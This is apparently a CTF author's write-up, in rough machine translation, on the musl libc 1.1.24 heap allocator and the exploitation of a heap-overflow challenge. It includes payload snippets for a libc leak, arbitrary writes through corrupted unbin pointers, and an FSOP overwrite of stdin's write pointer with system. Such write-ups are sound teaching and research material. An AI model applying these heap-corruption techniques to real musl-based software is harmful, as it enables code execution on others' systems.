Talking about the exploitation of musl libc heap vulnerability from a CTF question

Talking about the exploitation of musl libc heap vulnerability from a CTF question

 

This article uses a CTF topic to show how to exploit the musl libc heap overflow vulnerability.

0. Preface

The 2020 XCTF college war "epidemic" ended on March 9th. On behalf of the Xp0int team of Jinan University , I contributed a PWN question musl.

The focus of the topic is the exploitation of heap vulnerabilities under musl libc, mainly the implementation of musl libc heap manager and the exploitation of heap overflow vulnerabilities. Compared with the traditional glibc, the musl libc heap manager is very simple, the core source code is less than 400 lines, so as long as you read the source code carefully, you can easily find out how to exploit the vulnerabilities even if you haven't learned about musl libc before.

(The original name of the question was carbon, but for some reason, the name changed to musl...)

This article starts from the subject of musl and introduces the method of exploiting musl libc heap vulnerabilities. It is divided into three parts: the first part explains the mistakes in the question, the second part is an overview of the implementation of the musl libc heap manager, and finally the topic analysis and exploit .

For the first submission, I hope you can give me your advice.

 

1. Make a mistake

In fact, this is the first time I have asked questions for a CTF competition for the public. I have only asked some simple basic questions for novices in the school . I was very careful when setting the questions, and spent a lot of time deliberately to consolidate the questions to prevent mistakes and unexpected solutions. In the end, all the great gods found an unexpected solution, which broke the problem. . .

After review, I found two mistakes. The main reason is that the problem was not carefully checked and extra information was leaked to the players. Next, let's talk about the mistakes that occurred and how to fix them.

void init()
{
    setvbuf(stdin,  NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    LIST = mmap(0, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if( LIST == (struct item*)-1 ) {
        echo("ERROR: Unable to mmapn");
        a_crash();
    }

    alarm(30);
} 

Both errors are located in the initfunction ( sub_400B77). The above is initthe source code of the function, which is used to initialize the problem environment.


1.1 Stack address

The biggest mistake is not clearing the stack address on the libc library.

The expected solution to the problem is to use FSOP to hijack the program control flow, but if the stack address can be leaked, the ROP chain can be written directly to the stack. After the game, I took a look at the WP online, and most of them got the shell through this method.

pwndbg> leakfind $libc+0x292000 --page_name=stack --max_offset=0x4000 --max_depth=1
0x7ffff7ffb000+0x32f0   0x7fffffffe600 [stack]
0x7ffff7ffb000+0x31f8   0x7fffffffe390 [stack]
0x7ffff7ffb000+0x2fd8   0x7fffffffe4d8 [stack]
0x7ffff7ffb000+0x3000   0x7fffffffe765 [stack]
0x7ffff7ffb000+0x3008   0x7fffffffe770 [stack]
0x7ffff7ffb000+0x2908   0x7fffffffefe6 [stack] 

The repair method is very simple. First use it to pwdbgsearch the BSS section of the libc library where the stack address can be leaked.

#define WRITE_GOT 0x601F98
//clear all stack addresses in libc .BSS section
uint64_t* libc_bss = (uint64_t*)(*((uint64_t*)WRITE_GOT) - 0x5a3b5 + 0x292000);
libc_bss[0x2908/8] = 0;
libc_bss[0x2fd8/8] = 0;
libc_bss[0x3000/8] = 0;
libc_bss[0x3008/8] = 0;
libc_bss[0x31f8/8] = 0;
libc_bss[0x32f0/8] = 0;
libc_bss = 0; 

Then initclear them one by one in the function.

1.2 mmap

Another mistake is mmapto misuse the function, resulting in LISTaddress leakage.

//void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
LIST = mmap(0, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 

The problem is the addrparameters. When addris 0the time, mmapto find a vacant area in the memory space of the program, and then return to the first address of the area to the user, but this address is not random.

In gdbcan be found, the LISTmemory location is located just libc libraries, and have a fixed offset from the base address libc 0x28c000(libc base address can leak), which leads to LISTleakage of the address.

The expected solution is to use the method of hijacking the bin linked list to return an arbitrary pointer to achieve arbitrary address writing. However, if the LISTaddress is known , LISTthe pointer address above can be rewritten by direct hijacking .

//generate a 40 bit random address
uint64_t addr = 0;
int fd = open("/dev/urandom", O_RDONLY);
if( read(fd, &addr, 5) < 0 )
    a_crash();
close(fd);
addr &= ~0xFFF;

LIST = mmap((void*)addr, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if( LIST != (struct item*)addr ) {
    echo("ERROR: Unable to mmapn");
    a_crash();
}
addr = 0; 

The fix is to /dev/urandomrandomly generate a 40-bit address and addrpass it to the mmapfunction as a parameter . The program cannot open the PIE, because opening the PIE will cause the bypass 0xbadbeefmethod in the expected solution to be invalid.

After repair, it LISTis a random address.


void init()
{
    setvbuf(stdin,  NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

   //generate a 40 bit random address
    uint64_t addr = 0;
    int fd = open("/dev/urandom", O_RDONLY);
    if( read(fd, &addr, 5) < 0 )
        a_crash();
    close(fd);
    addr &= ~0xFFF;

    LIST = mmap((void*)addr, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    if( LIST != (struct item*)addr ) {
        echo("ERROR: Unable to mmapn");
        a_crash();
    }
    addr = 0;

    #define WRITE_GOT 0x601F98
   //clear all stack addresses in libc .BSS section
    uint64_t* libc_bss = (uint64_t*)(*((uint64_t*)WRITE_GOT) - 0x5a3b5 + 0x292000);
    libc_bss[0x2908/8] = 0;
    libc_bss[0x2fd8/8] = 0;
    libc_bss[0x3000/8] = 0;
    libc_bss[0x3008/8] = 0;
    libc_bss[0x31f8/8] = 0;
    libc_bss[0x32f0/8] = 0;
    libc_bss = 0;

    alarm(30);
} 

The above is initthe source code of the repaired function.

 

2. Overview of musl libc heap manager

musl libc is a lightweight libc library specially developed for embedded systems, featuring simplicity, light weight and high efficiency. There are many Linux distributions that set it as the default libc library to replace the bloated glibc, such as Alpine Linux (you should be familiar with Docker images), OpenWrt (usually used in routers), and Gentoo.

Due to space, I will only talk about the difference between musl libc heap manager and glibc, some data structures, the implementation of malloc and free, and static heap memory. The version of musl libc used in this article is v1.1.24 .

In principle, this memory allocator is roughly equivalent to Doug
Lea's dlmalloc with fine-grained locking.

malloc:

Uses a freelist binned by chunk size, with a bitmap to optimize
searching for the smallest non-empty bin which can satisfy an
allocation. If no free chunks are available, it creates a new chunk of
the requested size and attempts to merge it with any existing free
chunk immediately below the newly created chunk.

Whether the chunk was obtained from a bin or newly created, it's
likely to be larger than the requested allocation. malloc always
finishes its work by passing the new chunk to realloc, which will
split it into two chunks and free the tail portion. 

According to the design document , the musl libc heap manager is approximately equivalent to dlmalloc( ptmalloc2the predecessor of the glibc heap manager ), so some parts such as chunk and unbin are very similar to glibc.

The big difference from glibc is the design of bin. In musl libc, bin is composed of 64 two-way circular linked lists with a structure similar to small bins. Bitmap is used to record whether each linked list is not empty. The way to maintain the linked list is FILO (remove the chunk from the beginning of the linked list and insert the chunk from the end). Each bin has a different size range for holding chunks. The smallest can only hold one size of chunk, and the largest can hold up to 1024 chunks of different sizes.

musl libc does not implement hook functions such as __malloc_hookand __free_hook, so it cannot hijack program control flow directly through the heap. In addition, in a 64-bit system, the chunk size is aligned to 32 bytes, which is different from the glibc 16 byte alignment, so the minimum chunk size is 0x20 bytes, and then gradually increases according to 0x40, 0x60, 0x80...

For performance reasons, the musl libc heap manager omits many security checks, especially the validity check of chunk pointers, so the heap vulnerabilities of musl libc are easy to exploit.

The source code of malloc and free is located src/malloc/malloc.c, and some structures and macro definitions are located src/internal/malloc_impl.h.

2.1 Data structure

struct chunk {
    size_t psize, csize;//  glibc   prev size   size
    struct chunk *next, *prev;
}; 

The chunk header structure is similar to glibc, but there are no nextsizepointers, and psizefields are not reused between chunks .

psizecsizeBoth and fields have flag bits (glibc only has sizefields), but there is only one flag bit in the lowest bit INUSE(glibc has flag bits in the lowest three bits). If the INUSEflag bit is set (the lowest bit is 1), it means that the chunk is being used; if the INUSEflag bit is not set (the lowest bit is 0), it means that the chunk has been released or mmapallocated. psizeThe flag bit that needs to be passed to further judge the state of the chunk .

static struct {
    volatile uint64_t binmap;
    struct bin bins[64];
    volatile int free_lock[2];
} mal; 

malThe structure is similar to that in glibc, arenawhich records the state of the heap and has three members: a 64-bit unsigned integer binmap, a linked list header array, binsand a lock free_lock. binmapRecord whether each bin is non-empty. If a bit is 1, it means that the corresponding bin is non-empty, that is, there are chunks in the bin linked list.

struct bin {
    volatile int lock[2];
    struct chunk *head;
    struct chunk *tail;
}; 

The structure of the header of the bin linked list is as above. headThe and tailpointers point to the head and tail chunks respectively, prevand the nextpointers of the head chunk and the tail chunk point to the head of the bin linked list, thus forming a circular linked list. When the linked list is empty, the headsum tailpointer is equal to 0 or points to the head of the linked list itself.

bin subscript i Number of chunks chunk size range The relationship between subscript i and chunk size range
0-31 1 0x20 0x400 (i+1) * 0x20
32-35 8 0x420 0x800 (0x420+(i-32) 0x100) ~ (0x500+(i-32) 0x100)
36-39 16 0x820 0x1000 (0x820+(i-36) 0x200) ~ (0x1000+(i-36) 0x200)
40-43 32 0x1020 0x2000 (0x1020+(i-40) 0x400) ~ (0x1400+(i-40) 0x400)
44-47 64 0x2020 0x4000 (0x2020+(i-44) 0x800) ~ (0x2800+(i-44) 0x800)
48-51 128 0x4020 0x8000 (0x4020+(i-48) 0x1000) ~ (0x5000+(i-48) 0x1000)
52-55 256 0x8020 0x10000 (0x8020+(i-52) 0x2000) ~ (0xa000+(i-52) 0x2000)
56-59 512 0x10020 0x20000 (0x10020+(i-56) 0x4000) ~ (0x14000+(i-56) 0x4000)
60-62 1024 0x20020 0x38000 (0x20020+(i-60) 0x8000) ~ (0x28000+(i-60) 0x8000)
63 unlimited 0x38000 and above 0x38000 ~

The above is the chunk size range of each bin, which can be obtained from the function in the source codebin_index_up deduced from . The first 32 bins are similar to fastbin and small bin, and each bin corresponds to chunks of one size; the last 32 bins are similar to large bins, and one bin corresponds to chunks of multiple sizes.

For example, when the bin subscript is 34, it can be seen that the chunk size ranges from 0x620 to 0x700, that is, 0x620, 0x640, 0x660, 0x680, 0x6b0, 0x6d0, 0x6e0, and 0x700, a total of 8 chunks.

2.2 malloc implementation

//src/malloc/malloc.c L284-L331
void *malloc(size_t n)
{
    struct chunk *c;
    int i, j;

   //1. n   OVERHEAD (0x10)  32  
   //*n = (*n + OVERHEAD + SIZE_ALIGN - 1) & SIZE_MASK;
    if (adjust_size(&n) < 0) return 0;

   //  n   MMAP_THRESHOLD (0x38000)  mmap chunk
    if (n > MMAP_THRESHOLD) {
        [...]
        return CHUNK_TO_MEM(c);
    }

   //2.   n   bin   i
    i = bin_index_up(n);
    for (;;) {
       //3.   binmap
        uint64_t mask = mal.binmap & -(1ULL<<i);
       //  bin   expand_heap   chunk
        if (!mask) {
            c = expand_heap(n);
            [...]
            break;
        }
       //4.   n   bin   j
        j = first_set(mask);
        lock_bin(j);
        c = mal.bins[j].head;//c   bin j   chunk
       //5.   pretrim   c  unbin   c
        if (c != BIN_TO_CHUNK(j)) {
            if (!pretrim(c, n, i, j)) unbin(c, j);
            unlock_bin(j);
            break;
        unlock_bin(j);
    }

   //6.   c   n  
   /* Now patch up in case we over-allocated */
    trim(c, n);

    return CHUNK_TO_MEM(c);
} 

The implementation of malloc is very simple. The main step is to first select the bin through binmap, and then take out the chunk at the head of the bin linked list. There is no check on the linked list and the chunk header in the process of removing the chunk.

Malloc detailed steps:

  1. Adjust n, increase the head length and align 32 bits.
  2. If you n > MMAP_THRESHOLDuse mmapto create a size nof memory, returned to the user.
  3. If n <= MMAP_THRESHOLD, calculating nthe corresponding bin index i, look binmap
    • If all available bins are empty, extend the heap space and generate a new chunk
    • If the presence of a non-empty bin is available, select the closest size nto the bin j, the bin to obtain the list header chunkc
      • If they meet pretrimthe conditions, the use of pretrimsplitc
      • Otherwise, use the unbinRemove from the listc
    • Finally, the chunk is processed trimand returned to the user.

Next, let's talk briefly about unbin, pretrimand trim.

//src/malloc/malloc.c L188-L213
static void unbin(struct chunk *c, int i)
{
   //  bin   chunk  bin   bin
    if (c->prev == c->next)
        a_and_64(&mal.binmap, ~(1ULL<<i));
   //  chunk
    c->prev->next = c->next;
    c->next->prev = c->prev;
   //  INUSE  
    c->csize |= C_INUSE;
    NEXT_CHUNK(c)->psize |= C_INUSE;
} 

unbinIt is equivalent to that in glibc, unlinkand the function is to remove chunks from the bin doubly linked list. In the process of fetching, it is unbinnot checked whether the chunk pointer is legal.

//src/malloc/malloc.c L233-L264
/* pretrim - trims a chunk _prior_ to removing it from its bin.
 * Must be called with i as the ideal bin for size n, j the bin
 * for the _free_ chunk self, and bin j locked. */
static int pretrim(struct chunk *self, size_t n, int i, int j)
{
    size_t n1;
    struct chunk *next, *split;

   //  1: bin j   40
   /* We cannot pretrim if it would require re-binning. */
    if (j < 40) return 0;
   //  2: bin j   i   3   bin  
   //  j   63   split   MMAP_THRESHOLD
    if (j < i+3) {
        if (j != 63) return 0;
        n1 = CHUNK_SIZE(self);
        if (n1-n <= MMAP_THRESHOLD) return 0;
    } else {
        n1 = CHUNK_SIZE(self);
    }
   //  3: split   bin j   split   self   bin
    if (bin_index(n1-n) != j) return 0;

   //  n   chunk
    next = NEXT_CHUNK(self);
    split = (void *)((char *)self + n);

    split->prev = self->prev;
    split->next = self->next;
    split->prev->next = split;
    split->next->prev = split;
    split->psize = n | C_INUSE;
    split->csize = n1-n;
    next->psize = n1-n;
    self->csize = n | C_INUSE;
    return 1;
} 

pretrimThe function is to cut large chunks and prevent chunks whose size exceeds the demand from being allocated to users. When certain conditions are met, pretrima small chunk of the size just meets the requirements is cut from the first chunk of the bin linked list, and then the small chunk is allocated to the user, and the position of the first chunk of the linked list remains unchanged.

//src/malloc/malloc.c L266-L282
static void trim(struct chunk *self, size_t n)
{
    size_t n1 = CHUNK_SIZE(self);
    struct chunk *next, *split;

   // self   n1   n DONTCARE (0x10)  
    if (n >= n1 - DONTCARE) return;

   //  self   n  chunk split
    next = NEXT_CHUNK(self);
    split = (void *)((char *)self + n);

    split->psize = n | C_INUSE;
    split->csize = n1-n | C_INUSE;
    next->psize = n1-n | C_INUSE;
    self->csize = n | C_INUSE;

   //  split   bin
    __bin_chunk(split);
} 

The last step of malloc is trimthat the main function is to reclaim the chunk that exceeds the required size. trimCut the excess part of the chunk and release it to the bin to reduce memory waste.

2.3 free implementation

//src/malloc/malloc.c L519-L529
void free(void *p)
{
    if (!p) return;

    struct chunk *self = MEM_TO_CHUNK(p);

   //  csize   INUSE   mmap chunk   double free
   //#define IS_MMAPPED(c) !((c)->csize & (C_INUSE))
    if (IS_MMAPPED(self))
        unmap_chunk(self);
    else
        __bin_chunk(self);
}

//src/malloc/malloc.c L509-L517
static void unmap_chunk(struct chunk *self)
{
    size_t extra = self->psize;
    char *base = (char *)self - extra;
    size_t len = CHUNK_SIZE(self) + extra;
   //  prev size   INUSE   double free crash
   /* Crash on double free */
    if (extra & 1) a_crash();
    __munmap(base, len);
} 

free first checks the chunk for mmap/double free. If the chunk csizefield does not set the INUSEflag bit, enter the unmap_chunkfunction check psizefield. If psizethe INUSEflag bit is set in the field, it is regarded as double free and crash; otherwise, it is regarded as mmap chunk and __munmapis released by calling the function.

//src/malloc/malloc.c L440-L507
void __bin_chunk(struct chunk *self)
{
    struct chunk *next = NEXT_CHUNK(self);
    size_t final_size, new_size, size;
    int reclaim=0;
    int i;

   //new_size   self  final_size   self   chunk  
    final_size = new_size = CHUNK_SIZE(self);

   //  chunk   psize   self   csize  crash
   /* Crash on corrupted footer (likely from buffer overflow) */
    if (next->psize != self->csize) a_crash();

   //1.   self   chunk
    for (;;) {
        if (self->psize & next->csize & C_INUSE) {
           //  INUSE  
            self->csize = final_size | C_INUSE;
            next->psize = final_size | C_INUSE;
           //  final_size   bin   i
            i = bin_index(final_size);
            lock_bin(i);
            lock(mal.free_lock);
            if (self->psize & next->csize & C_INUSE)
                break; // 
            unlock(mal.free_lock);
            unlock_bin(i);
        }

       //  chunk
        if (alloc_rev(self)) { //  bin   chunk
            self = PREV_CHUNK(self);
            size = CHUNK_SIZE(self);
            final_size += size;
            if (new_size+size > RECLAIM && (new_size+size^size) > size)
                reclaim = 1;
        }

       //  chunk
        if (alloc_fwd(next)) { //  bin   chunk
            size = CHUNK_SIZE(next);
            final_size += size;
            if (new_size+size > RECLAIM && (new_size+size^size) > size)
                reclaim = 1;
            next = NEXT_CHUNK(next);
        }
    }

   //2.   binmap   bin i   bin
    if (!(mal.binmap & 1ULL<<i))
        a_or_64(&mal.binmap, 1ULL<<i);

    self->csize = final_size;
    next->psize = final_size;
    unlock(mal.free_lock);

   //3.   self   bin i  
    self->next = BIN_TO_CHUNK(i);
    self->prev = mal.bins[i].tail;
    self->next->prev = self;
    self->prev->next = self;

   /* Replace middle of large chunks with fresh zero pages */
    if (reclaim) {
        [...]
    }

    unlock_bin(i);
} 

__bin_chunkThe function of the function is to insert chunks into the bin linked list. First merge the free chunks before and after the chunk, set the binmap and chunk flags, and finally insert the chunk into the corresponding bin linked list.

2.4 Static heap memory

In glibc, the heap is generally located in a dynamic memory area in memory. In order to reduce the memory overhead, the musl libc heap manager divides the free memory of the program and libc library (static memory) into heap memory, and preferentially uses static heap memory to allocate chunks. Only when the static heap memory is exhausted or cannot meet the demand, musl libc will apply for dynamic memory.

Next, let s introduce how musl libc implements this feature.

void __dls3(size_t *sp)
{
    [...]
   //ldso/dynlink.c L1839-L1840
   /* Donate unused parts of app and library mapping to malloc */
    reclaim_gaps(&app);
    reclaim_gaps(&ldso);
    [...]
} 

During the initialization process, musl libc calls reclaim_gapsfunctions to find and release the free memory of the program and libc library.

//ldso/dynlink.c L526-L552
/* A huge hack: to make up for the wastefulness of shared libraries
 * needing at least a page of dirty memory even if they have no global
 * data, we reclaim the gaps at the beginning and end of writable maps
 * and "donate" them to the heap. */

static void reclaim(struct dso *dso, size_t start, size_t end)
{
   //  RELRO  
    if (start >= dso->relro_start && start < dso->relro_end) start = dso->relro_end;
    if (end   >= dso->relro_start && end   < dso->relro_end) end = dso->relro_start;
    if (start >= end) return;
    char *base = laddr_pg(dso, start);
   //  __malloc_donate   bin  
    __malloc_donate(base, base+(end-start));
}

static void reclaim_gaps(struct dso *dso)
{
    Phdr *ph = dso->phdr;
    size_t phcnt = dso->phnum;

   // 
    for (; phcnt--; ph=(void *)((char *)ph+dso->phentsize)) {
       //  1 PT_LOAD 
        if (ph->p_type!=PT_LOAD) continue;
       //  2 
        if ((ph->p_flags&(PF_R|PF_W))!=(PF_R|PF_W)) continue;
       //  reclaim  
        reclaim(dso, ph->p_vaddr & -PAGE_SIZE, ph->p_vaddr);
        reclaim(dso, ph->p_vaddr+ph->p_memsz,
            ph->p_vaddr+ph->p_memsz+PAGE_SIZE-1 & -PAGE_SIZE);
    }
} 

reclaim_gapsFunction through each memory segment, if find qualified, calculated memory page segment belongs to ~ , and ~ passed to the two free memory block reclaimfunctions by finally __malloc_donatereleased into the bin function.

After musl libc is initialized, it gdbcan be found that there are two chunks in the bin, and their memory locations happen to be located in the libc library and program. malloc can use trimor pretrimcut these two chunks to generate multiple chunks and assign them to users.

This feature is conducive to information leakage in the process of exploiting: if a chunk address is known, it is equivalent to leaking the libc base address or program base address; on the contrary, if the libc base address or program base address can be leaked, any calculation can be made. The address of the chunk.

 

3. Topic analysis

Title source code: github.com/xf1les/XCTF...

Run build.sh under the source directory to compile libc library and carbon program with debugging information.

root@4124cf40a89b:/pwn/Debug# ./libc.so
musl libc (x86_64)
Version 1.1.24
Dynamic Program Loader
Usage: ./libc.so [options] [--] pathname [args]
root@4124cf40a89b:/pwn/Debug# checksec carbon
[*] '/pwn/Debug/carbon'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000) 

The program opens all protection mechanisms except PIE, and the musl libc version is 1.1.24.

1) Assign sleeves
2) Destory sleeves
3) Transform sleeves
4) Examine sleeves
5) Real death
> 

Typical menu questions, you can add, delete, edit and display piles. The following places need attention:

  • add allows the heap to overflow once, and the overflow length is 0x50 bytes.
  • There is only one place to call the exitfunction: when the address of the pointer returned by malloc is0xbadbeef time.
  • The view can only be used once.

 

4. Vulnerability Exploitation

Vulnerability exploitation is mainly divided into three steps: the first step is to leak the libc base address; the second step is to rewrite the pointer field of the first chunk of the linked list through heap overflow, and use unbin to write arbitrary addresses; the third step is to lay out FSOP and modify the internal variables of the heap through exitfunctions Trigger the FSOP and get the shell.

4.1 Leaking libc base address

To apply for a chunk with a size less than 0x400 bytes, the first 8 bytes of the chunk are the address of the header of the bin linked list remaining when unbin. If you use a view that can only be used once, the libc base address can be leaked.

add(0x1, 'A') #0
libc_base = u64(view(0).ljust(8, 'x00')) - 0x292e41 # bin[0] 

When the chunk size is 0x20 bytes, the offset of mal.bins[0]the linked list head pointed to by the address mal+832relative to the base address is 0x292e00.

4.2 Use unbin to achieve arbitrary address writing

Unbin does not check whether the prevsum nextpointer is legal. We can rewrite these two pointers through heap overflow, and use unbin to write the pointer address to any address, that is, the *(uint64_t*)(prev + 2) = nextsum *(uint64_t*)(next + 3) = prev.

As shown in the figure, it mal.bins[38]is a non-empty bin. We can build a fake chunk near the memory block to be controlled, use unbin to write the fake chunk address to the mal.bins[38]->headpointer, and mallocreturn to the fake chunk by hijacking the bin linked list to achieve arbitrary address writing.

4.2.1 Hijacking the bin list

add(0x10, 'A'*0x10) #1
add(0x10, 'B'*0x10) #2, prevent consolidation
add(0x10, 'C'*0x10) #3
add(0x10, 'D'*0x10) #4, prevent consolidation

free(1)
free(3) 

First allocate 4 chunks with a size of 0x20 bytes, and then release chunk 1 and chunk 3. The released chunk enters the mal.bins[0]linked list, and the mal.bins[0]->headpointer points to chunk 1.

bin = libc_base + 0x292e40 # mal.bins[38]->head

next = bin - 0x10
prev = fake_chunk

payload  = 'X' * 0x10
payload += p64(0x21) * 2 + 'X' * 0x10
payload += p64(0x21) + p64(0x20) + p64(next) + p64(prev)
payload += p8(0x20)
payload += 'n'

add(0x10, payload, 'Y') #1, heap overflow 

Then allocate a 0x20 byte chunk, malloc mal.bins[0]fetches headthe chunk 1 pointed to by the headpointer , and updates the pointer to chunk 3. The heap overflows chunk 1, and the chunk 3 prevpointer is rewritten . The nextpointer is the fake chunk address and mal.bins[38]->headpointer address.

add(0x10) # 3, unbin #1 

The 0x20 byte chunk is allocated again, malloc unbins chunk 3 and writes the fake chunk address to the mal.bins[38]->headpointer.

add(0x50) # 5, fake chunk 

Finally, a 0x60 byte chunk is allocated, and malloc mal.bins[38]takes out the fake chunk and returns the fake chunk address.

edit(3, p64(next) + p64(prev2))
add(0x10) # 3, unbin #2
add(0x50) # 5, fake_chunk #2

edit(3, p64(next) + p64(prev3))
add(0x10) # 3, unbin #3
add(0x50) # 6, fake_chunk #3

edit(3, p64(next) + p64(prev4))
add(0x10) # 3, unbin #4
add(0x50) # 7, fake_chunk #4

edit(3, p64(next) + p64(prev5))
add(0x10) # 3, unbin #5
add(0x50) # 8, fake_chunk #5

[......] 

Since the mal.bins[0]linked list has been destroyed, the mal.bins[0]->headpointer is no longer updated and continues to point to chunk 3. By continuously modifying the prevpointer of chunk 3 , we can achieve multiple arbitrary address writes.

4.2.2 Construct fake chunk

Since malloc does not check the header of the chunk, as long as the prevsum nextpointer of the fake chunk points to a legal address, it can be taken out of the bin linked list through unbin, that is *(uint64_t*)(fake_chunk + 2), *(uint64_t*)(fake_chunk + 3)the value of the sum is a writable memory block address.

In addition to using existing fake chunks, we can also use unbin to construct fake chunks on any memory block:

fake_chunk = target - 0x10

edit(3, p64(fake_chunk) + p64(fake_chunk))
add(0x10) # 3, unbin 

Assume that the address of the memory block to be controlled is target. Set the prevand nextpointers of chunk 3 at the same time target - 0x20, and then unbin.

Before unbin.

After unbin, the prevsum nextpointer of the fake chunk is rewritten to the fake chunk address by unbin, which just meets the construction conditions.

free(n) # chunk n   0x20 

Then release a chunk of 0x20 bytes.

//src/malloc/malloc.c L188-L191
static void unbin(struct chunk *c, int i)
{
    if (c->prev == c->next)
        a_and_64(&mal.binmap, ~(1ULL<<i));

[...]
} 
void __bin_chunk(struct chunk *self)
{

[...]
   //src/malloc/malloc.c L482-L483
    if (!(mal.binmap & 1ULL<<i))
        a_or_64(&mal.binmap, 1ULL<<i);

[...]
} 

This is because when prevand nextequal pointer, unbin will be mal.bins[0]set to the empty bin. It is mal.bins[0]unavailable As long as any chunk of 0x20 is released, it mal.bins[0]can be reset to a non-empty bin.

Note that there can be no free chunks before and after the chunk to be released, otherwise free will merge it, causing the chunk to be released to other bins.

edit(3, p64(bin - 0x10) + p64(fake_chunk))
add(0x10) # 3, unbin
add(0x50) # n+1, target 

Finally, use unbin to write the fake_chunk address to the mal.bins[38]->headpointer, and finally control it target.

4.3 FSOP

After leaking the libc base address and implementing arbitrary address writing, the next step is to consider how to hijack the program control flow to get the shell. musl libc does not have a similar __malloc_hookhook function that can easily hijack the control flow. The only feasible method at present is to do FSOP and cover FILEthe function pointer on the structure (if the unexpected solution mentioned above is not considered).

pwndbg> ptype stdin
type = struct _IO_FILE {
    unsigned int flags;
    unsigned char *rpos;
    unsigned char *rend;
    int (*close)(FILE *);
    unsigned char *wend;
    unsigned char *wpos;
    unsigned char *mustbezero_1;
    unsigned char *wbase;
    size_t (*read)(FILE *, unsigned char *, size_t);
    size_t (*write)(FILE *, const unsigned char *, size_t);
    off_t (*seek)(FILE *, off_t, int);
    unsigned char *buf;
    size_t buf_size;
    FILE *prev;
    FILE *next;
    int fd;
    int pipe_pid;
    long lockcount;
    int mode;
    volatile int lock;
    int lbf;
    void *cookie;
    off_t off;
    char *getln_buf;
    void *mustbezero_2;
    unsigned char *shend;
    off_t shlim;
    off_t shcnt;
    FILE *prev_locked;
    FILE *next_locked;
    struct __locale_struct *locale;
} * const
pwndbg> vmmap stdin
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x7ffff7ffb000     0x7ffff7ffc000 rw-p     1000 92000 /pwn/Debug/libc.so
pwndbg> 

The above is _IO_FILEthe definition of the structure. musl libc version _IO_FILEstructure of the vtable no specific, only four function pointers close, read, writeand seekand distributed in different locations in the structure. Since the memory block where the stin, stdoutand stderrstructure are located is writable, we can rewrite the above content by writing to any address.

//sub_400E07
p = (char *)malloc(size);
if ( p == (char *)0xBADBEEF )
{
  sub_400AEC("ERROR: Bad beefn");
  exit(-1);
} 

In the program, a exitfunction is called in one place .

//src/exit/exit.c L27-L33
_Noreturn void exit(int code)
{
    __funcs_on_exit();
    __libc_exit_fini();
    __stdio_exit();  <---
    _Exit(code);
} 
//src/stdio/__stdio_exit.c L16-L23
void __stdio_exit(void)
{
    FILE *f;
    for (f=*__ofl_lock(); f; f=f->next) close_file(f);
    close_file(__stdin_used);  <---
    close_file(__stdout_used);
    close_file(__stderr_used);
} 
//src/stdio/__stdio_exit.c L8-L14
static void close_file(FILE *f)
{
    if (!f) return;
    FFINALLOCK(f);
    if (f->wpos != f->wbase) f->write(f, 0, 0);  <---
    if (f->rpos != f->rend) f->seek(f, f->rpos-f->rend, SEEK_CUR);
} 

Looking through the source code, I found that the exitfunction later called the __stdio_exitfunction to close all open file streams. In close_filefunction, the file stream if feligible f->wpos != f->wbase, then call fon the file structure of writefunction pointers: f->write(f, 0, 0).

payload  = "/bin/shx00"    # stdin->flags
payload += 'X' * 32
payload += p64(0xdeadbeef)  # stdin->wpos
payload += 'X' * 8
payload += p64(0xbeefdead)  # stdin->wbase
payload += 'X' * 8
payload += p64(system)      # stdin->write

edit(stdin, payload) 

The condition for triggering FSOP is very simple: just stdinwrite to the first 8 bytes of the structure /bin/shx00, writepoint the pointer to the systemfunction, stdin->wpos != stdin->wbaseand finally call the exitfunction to get the shell.

In addition to exitfunctions, there are similar FSOP trigger points in standard IO library functions such as scanf, printfand puts. If you are interested, you can read the source code of related functions yourself.

4.4 Return 0xBADBEEF

But if you want to call a exitfunction, the mallocreturned address must be 0xBADBEEF, which 0xBADBEEFis obviously not a valid memory address. By modifying a brkglobal variable named inside libc , it will not only 0xBADBEEFbecome an address that can be accessed normally, but also mallocreturn the address.

//src/malloc/malloc.c L303-L315
void *malloc(size_t n)
{

[...]

    for (;;) {
        uint64_t mask = mal.binmap & -(1ULL<<i);
       //  bin   expand_heap   chunk
        if (!mask) {
            c = expand_heap(n);  <---
            if (!c) return 0;
           //  chunk
            if (alloc_rev(c)) {
                struct chunk *x = c;
                c = PREV_CHUNK(c);
                NEXT_CHUNK(x)->psize = c->csize =
                    x->csize + CHUNK_SIZE(c);
            }
            break;
        }

[...]
} 

When all available bins are empty, malloccall the expand_heapfunction to extend the heap memory space and generate a new chunk. expand_heapThe function is called inside the __expand_heapfunction.

//src/malloc/expand_heap.c L39-L61
void *__expand_heap(size_t *pn)
{
    static uintptr_t brk; //brk  
    static unsigned mmap_step;
    size_t n = *pn; //n   chunk  

   //n   0x7FFFFFFFFFFFEFFF
    if (n > SIZE_MAX/2 - PAGE_SIZE) {
        errno = ENOMEM;
        return 0;
    }
    n += -n & PAGE_SIZE-1;

   //  brk   NULL 
    if (!brk) {
        brk = __syscall(SYS_brk, 0);
        brk += -brk & PAGE_SIZE-1;
    }

   //  brk   brk+n  
   //  brk  
    if (n < SIZE_MAX-brk && !traverses_stack_p(brk, brk+n)
        && __syscall(SYS_brk, brk+n)==brk+n) {   <---
        *pn = n;
        brk += n;
        return (void *)(brk-n);
    }

   //  brk   mmap  
    [...]
} 

In the __expand_heapfunction, it brkis a pointer to the end of the data segment (dynamic memory). __expand_heapThe function calls the brk system call __syscall(SYS_brk, brk+n)to extend the end of the data segment backward by nbytes, and then the extended part is returned tomalloc be allocated to the user as a new chunk.

